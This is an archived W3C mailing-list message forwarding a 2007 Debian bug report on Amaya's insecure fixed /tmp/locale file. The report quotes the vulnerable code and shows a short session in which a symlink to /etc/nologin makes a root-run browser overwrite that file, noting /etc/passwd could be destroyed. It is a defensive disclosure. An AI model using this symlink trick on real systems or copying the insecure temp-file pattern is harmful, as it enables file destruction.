W3C home > Mailing lists > Public > www-amaya@w3.org > July to September 2007

[Fwd: Bug#431600: amaya: Insecure use of temporary files allows arbitary file trunaction/creation]

From: Regis Boudin <regis@boudin.name>
Date: Thu, 5 Jul 2007 14:33:08 +0100 (BST)
Message-ID: <45614.195.224.154.166.1183642388.squirrel@mail.imalip.net>
To: www-amaya@w3.org

Hi,

I've been notified this bug, by Steve Kemps who is running a security
audit of the source code in the debian archive. I'm a very busy at the
moment so don't have time to provide a patch going with it, but will be
happy to give some help if you need it.

Thanks,

Regis

---------------------------- Original Message ----------------------------
Subject: Bug#431600: amaya: Insecure use of temporary files allows
arbitary file trunaction/creation
From:    "Steve Kemp" <skx@debian.org>
Date:    Tue, July 3, 2007 19:42
To:      "Debian Bug Tracking System" <submit@bugs.debian.org>
--------------------------------------------------------------------------

Package: amaya
Version: 9.54~dfsg.0-1
Severity: important


  The Amaya package contains the following code inside
 amaya-9.51/Amaya/thotlib/unicode/ustring.c

        {
          int  fd;
          char buffer[256];
          memset ( buffer, 0, 256 );
          /* ask the system using locale command */
          system ("locale -ck LC_MESSAGES | grep messages-codeset | sed
's/.*=\"//' | sed 's/\"//' > /tmp/locale");
          fd = open ("/tmp/locale", O_RDONLY);


  This can be abused to allow arbitary files to be created, or truncated,
 when a user runs the browser as this session shows:

  # check there are no files, then create an evil symlink
skx@vain:~$ ls -l /etc/nologin /tmp/locale
ls: /etc/nologin: No such file or directory
ls: /tmp/locale: No such file or directory
skx@vain:~$ ln -s /etc/nologin /tmp/locale

 # wait for root to run the application
skx@vain:~$ sudo -s
root@vain:~# amaya

 # see the file
root@vain:~# ls /etc/nologin
/etc/nologin
root@vain:~# cat /etc/nologin
UTF-8

  Obviously this example relies upon root to run the application and  linking
 to /etc/passwd would trash the system.

  I guess the solution is to generate a secure temporary filename with
 mktemp, mkstemp, or similar..

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.18-xen (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages amaya depends on:
ii  amaya-data              9.54~dfsg.0-1    Web Browser, HTML Editor and
Testb
ii  libc6                   2.5-11           GNU C Library: Shared libraries
ii  libexpat1               1.95.8-3.4       XML parsing C library -
runtime li
ii  libfreetype6            2.2.1-6          FreeType 2 font engine,
shared lib
ii  libgcc1                 1:4.2-20070627-1 GCC support library
ii  libgl1-mesa-glx [libgl1 6.5.2-5          A free implementation of the
OpenG
ii  libglu1-mesa [libglu1]  6.5.2-5          The OpenGL utility library (GLU)
ii  libjpeg62               6b-13            The Independent JPEG Group's
JPEG
ii  libpng12-0              1.2.15~beta5-2   PNG library - runtime
ii  libraptor1              1.4.15-3         Raptor RDF parser and
serializer l
ii  libstdc++6              4.2-20070627-1   The GNU Standard C++ Library v3
ii  libwww-ssl0             5.4.0-11         The W3C-WWW library (SSL
support)
ii  libwxbase2.6-0          2.6.3.2.1.5      wxBase library (runtime) -
non-GUI
ii  libwxgtk2.6-0           2.6.3.2.1.5      wxWidgets Cross-platform C++
GUI t
ii  ttf-freefont            20060501cvs-12   Freefont Serif, Sans and Mono
True
ii  zlib1g                  1:1.2.3.3.dfsg-3 compression library - runtime

Versions of packages amaya recommends:
pn  amaya-doc                     <none>     (no description available)

-- no debconf information

Steve
--
#  Kink-Friendly Dating
http://ctrl-alt-date.com/
Received on Thursday, 5 July 2007 13:33:19 UTC

This archive was generated by hypermail 2.3.1 : Tuesday, 1 April 2014 11:01:47 UTC